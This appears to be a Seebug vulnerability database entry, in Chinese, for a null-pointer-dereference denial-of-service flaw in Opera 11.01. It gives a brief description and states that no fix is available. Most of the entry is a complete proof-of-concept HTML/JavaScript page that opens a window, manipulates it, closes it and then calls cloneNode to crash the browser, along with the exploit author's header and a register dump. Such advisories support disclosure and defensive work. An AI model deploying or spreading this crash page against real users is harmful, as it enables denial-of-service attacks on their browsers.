Opera Web Browser Window空指针引用拒绝服务漏洞

2011-03-18T00:00:00
ID SSV:20376
Type seebug
Reporter Root
Modified 2011-03-18T00:00:00

Description

Bugtraq ID: 46872 CNCAN ID:CNCAN-2011031601

Opera Web Browser是一款开放源代码的WEB浏览器。 Opera Web Browser不正确处理特制的WEB页,可导致引用空指针而使应用程序崩溃,造成拒绝服务攻击。

Opera Software Opera Web Browser 11.01 目前没有详细解决方案提供: http://www.opera.com/

                                        
                                            
                                                <html>
  <head>
  <title>Opera 11.01 Null Ptr Derefer</title>
  </head>
  <body>
   <script type="text/JavaScript" language="JavaScript">
    
    /*
    * [+]. Title : Opera 11.01 Null Pointer Derefernce
    * [+]. Date : 15.03.2011 05:18
    * [+]. Author: echo
    * [+]. Version: 11.01
    * [+]. Software link: http://www.opera.com/download/
    * [+]. Tested on : Win32 xp home sp 2
    * [+]. CVE : NULL   
    * ---------------------------------------
    * 675B5646  MOV ECX,DWORD PTR DS:[EDI+8]  
    * DS:[00000008]=???
    * ECX=00000000  
    * EDI=00000000                   
    */
    var iWin  = window.open();
    var iShit = iWin.document.createElement("ANY");
        iWin.document.body.appendChild(iShit);
        iWin.close();
        iWin.document.cloneNode("HiH"); 
         
   </script>
  </body>
</html>